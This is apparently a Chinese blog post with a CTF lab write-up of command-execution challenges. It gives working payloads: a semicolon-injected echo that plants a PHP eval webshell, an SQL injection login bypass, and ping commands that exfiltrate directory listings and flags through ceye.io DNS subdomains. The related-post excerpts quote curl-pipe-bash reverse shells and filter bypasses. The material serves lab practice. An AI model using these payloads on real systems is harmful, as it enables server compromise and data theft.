安鸾渗透实战平台-命令执行系列

已于 2022-01-28 00:21:33 修改
阅读量1.5k 收藏 1
点赞数 2
分类专栏: CTF -WEB 学习 文章标签: php 数据库 linux
于 2022-01-27 23:56:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AAAAAAAAAAAA66/article/details/122725244
版权

简单的回顾一下今天刷的命令执行题目

目录

PHP代码练习

webshell&中国菜刀

命令执行01

命令执行02

总结

 

PHP代码练习

直接给一个编辑器可以命令执行,那么直接用php的命令执行函数system,

<?php system('ls /');?>

cat命令打开

webshell&中国菜刀

题目提示在数据库里

直接用蚁剑连接

进去之后发现一个 配置文件

<?php
$servername = "mysql";
$username = "root";
$password = "root";
 
// 创建连接
$conn = new mysqli($servername, $username, $password);
// 检测连接
if ($conn->connect_error) {
    die("连接失败: " . $conn->connect_error);
} 
 
// 创建数据库
$sql = "CREATE DATABASE test123";
if ($conn->query($sql) === TRUE) {
    echo "数据库创建成功====>>>";
} else {
    echo "Error creating database: " . $conn->error;
}
 
$conn->close();

header("location:tips.txt");
?>

 有数据库的账号和密码

蚁剑连接 (点击数据操作

数据库地址填mysql 后面试了不大写也行。

找到flag

命令执行01

点击那个图片下载成这样。。

 在这个输入框利用 ; 拼接命令执行语句

backup.tar.gz;echo '<?php @eval($_POST["123"]); ?>' >xxx.php

 

可以访问到xxx.php

 蚁剑连接即可

命令执行02

登陆框 存在注入 用万能语句登陆

admin' or 1=1#

 注意不能用 1' or 1=1# 怀疑题目做了一些修改 这样以admin身份登陆

 后面需要用到dnslog 或者ceye.io 获取命令执行回显

进入到这个界面

同样是利用 ; 拼接命令执行语句

注意反引号 ----linux中反引号的作用(` `)-------获取执行命令的结果

localhost;ping -c 1 `ls /`.xxxxxx.ceye.io

 上传后点击黄色的检测按钮

 咋突然出现这么多flag?

可能是平台是共有的把 ,有人可能点击了我的语句。

但是ls今天试了一下回显不出文件 所以用不了上面的语句可以用

localhost;ping -c `cat flag /`.xxxxxi.ceye.io

 这样得到flag

 

总结

其实题目难度不大,但是可以点积累经验,还是有不小收获的

另外个人的确也踩了不少坑,不过为了篇幅就没过多叙述,再各个命令执行题目也尝试了不同解法,只不过没啥技术性的突破。还是按照前人的write up来。

zh的博客_漏了个大洞_CSDN博客-靶场练习笔记,漏洞复现,学习笔记领域博主

 

AAAAAAAAAAAA66
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安鸾-RCE命令执行
WEB渗透测试 从入门到萌新
10-08 732
1、万能密码登录 1' or 1# 密码随意 2、admin' or 1=1# 密码随意 直接弱口令。:写入到当前目录下的shell.php(没有就创建一个)1、webshell 中国菜刀。写入一句话 菜刀连接。
初始webshell+中国菜刀的使用
m0_48222671的博客
04-18 5311
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 文章目录一、webshell是什么?二、木马三、中国菜刀 一、webshell是什么? “Web” 的含义是服务器开放web服务; "Shell"的含义是取得对服务器某种程度上的操作权限; "webshell"就是获取对服务器的控制权限,这就需要我们借助一些webshell管理工具和一些漏洞去得到这种权限。 二、木马 在我们使用webshell管理工具之前,需要先在目标服务器上传或创建一个木马文件 木马分为大马、小马和一句话木马: 小马:文.
linux mysql udf 提权
ddr12231的博客
05-09 681
连接远程数据库 查看插件库路径 show variables like '%plugin%'; 写入udf库到插件目录: select unhex('7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000...
命令执行的题目加理解
zbbjya的博客
03-21 743
听课笔记ctfshow的理解29 上图中我们会看到有一个preg_match 的函数进行正则表达式的匹配,成功返回1,否则返回0 要有分号不然出不来 phpinfo();使用时后要加分号 分号可以用?>代替 主要作用用法可以看这 https://blog.csdn.net/lituxiu/article/details/89330431?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164783517216781683952973%
网站渗透实战篇.全面解析漏洞(20节课)
10-15
网站渗透实战篇.全面解析漏洞,内富解压密码,请看说明
CISP-PTE-005-Web安全基础1 - HTTP协议.pptx
03-10
CISP-PTE CISP-PTE-005-Web安全基础1 - HTTP协议.pptx
2019 CTF题目下载及write up(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
- 在Sokoban游戏相关的CTF挑战中,参赛者可能需要在规定时间内完成一系列关卡,寻找隐藏的标志,这涉及到逻辑推理和快速解决问题的能力。 5. **CTF比赛技巧**: - CTF比赛通常涉及多种技术领域,包括逆向工程、...
xsser.7z漏洞练习靶场
01-03
这个"Xsser.7z漏洞练习靶场"提供了一个平台,帮助安全从业者和Web开发者了解XSS漏洞的原理、类型以及防御方法,提升网络安全技能。 首先,我们需要理解XSS的分类。主要分为三类:反射型XSS、存储型XSS和DOM型XSS。...
java反序列化漏洞工具AllInOne
01-05
java反序列化漏洞检测工具集 支持 jboss weblogic Websphere 本工具仅为方便管理员发现和展示漏洞的危害性,请勿用于非法用途
安鸾渗透实战平台wp(持续更新)
Delity的博客
05-13 6791
一、SQL注入 SQL数字型GET注入01 漏洞URL:http://www.whalwl.top:8001/bug/sql_injection/sql_num.php 1’报错,输入-1返回正常,构造payload, 判断字段:显示位在第二位和第三位 -1 order by 3 # 爆库: -1 union select 1,database(),3 # 爆表: -1 union select 1,group_concat(table_name),3 from information_sch
安鸾渗透实战平台—— 命令执行01 (100分)
weixin_50985113的博客
03-02 1016
环境 安鸾渗透实战平台—— 命令执行01 (100分) 菜刀 题目 写入一句话木马 backup.tar.gz;echo '<?php @eval($_POST["666"]); ?>' >shell.php echo:输出 <?php @eval($_POST["666"]); ?>:一句话木马的内容 >shell.php:写入到当前目录下的shell.php(没有就创建一个) 使用菜刀连接 ...
命令执行靶场实战
qq_23347209的博客
05-31 548
文章目录环境准备一、信息搜集1、nmap扫描2、使用nikto扫描网站目录二、漏洞利用测试三、nc反弹shell 环境准备 靶场下载地址:https://www.vulnhub.com/entry/depth-1,213/ 使用Vmware虚拟机中NAT网络 靶机: 192.168.146.153 攻击机 parrot 192.168.146.129 提示:以下是本篇文章正文内容,下面案例可供参考 一、信息搜集 1、nmap扫描 -A全面扫描 -p-全端口扫描 nmap -A -p- 192.168
CISP-PTE练习篇(基础题目之命令执行
wojiaoqwe的博客
01-30 1380
本文仅当作练习记录使用。
记录CTF命令执行练习中遇到的几道题(一些PHP命令过滤的绕过方法)
weixin_40103894的博客
10-01 1581
【代码】记录CTF命令执行练习中遇到的几道题(一些PHP命令过滤的绕过方法)
kali渗透学习-Web渗透WebShell(中国菜刀、WeBaCoo、Weevely)
weixin_43239236的博客
01-23 820
Webshell 本质:<?php echo shell_exec($_GET['cmd']);?> 就是连接web执行一个shell终端,用一句话在浏览器中执行,不方便 windows平台 中国菜刀 中国菜刀官网:胖客户端程序,国产中比较优秀的webshell,适用性较强  【但版本众多而乱,可能存在木马,据说的官网http://www.maicaidao.co/】 1、利用上传漏洞,先上传一句话木马【支持三种服务器端PHP、ASP、ASP.NET】 使用ssh连接metasploitabl
CTF命令执行题目解题思路
悦分享
08-02 748
可以看到该文件有curl xx.x.x.x|bash字符,在linux下输入任意一个字符后加\是不会中断当前操作,可以继续输入内容。而后面没有\则会中断,而sh可以在报错的情况下依然会执行可以执行命令,因此不会影响curl的执行。在自己服务器中放入bash一句话,利用curl ip|bash反弹shell。ls -t >g是倒序输出文件名字,然后sh _执行此文件,写入到g中。原理就是利用curl ip|bash等很多方式去反弹shell。利用linux下特有的命令来写入shell反弹。...
基础题目五:命令执行
king丶
07-31 1174
基础题目五:命令执行 发现过滤 cat | &符没过滤 127.0.0.1& 能执行 127.0.0.1&cat ../key.php 发现还是不行。 那就是过滤了cat 使用\ 127.0.0.1&c\at ../key.php 还是不行,过滤了key 使用通配符 127.0.0.1&c\at ../ke* 通配符 通配符是一种特殊语句,主要有星号(*)和问号(?),用来模糊搜索文件。当查
从一道CTF题目谈PHP中的命令执行
蚁景网安学院
03-11 1978
快睡的时候,打开B站发现有位用户留言,大意就是让我帮忙看一道题,正好当时有空,于是就打开了他发的链接,代码如下<?php show_source(__FILE__); $mess=...
安鸾sql宽字符02
最新发布
07-28
抱歉,我无法回答关于安鸾SQL宽字符02的问题。 #### 引用[.reference_title] - *1* [安鸾SQL系列之数字字符串](https://blog.csdn.net/weixin_46318141/article/details/123917863)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [安鸾靶场 宽字符注入02 靶场练习 详细过程及解决问题笔记](https://blog.csdn.net/AAAAAAAAAAAA66/article/details/122800595)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值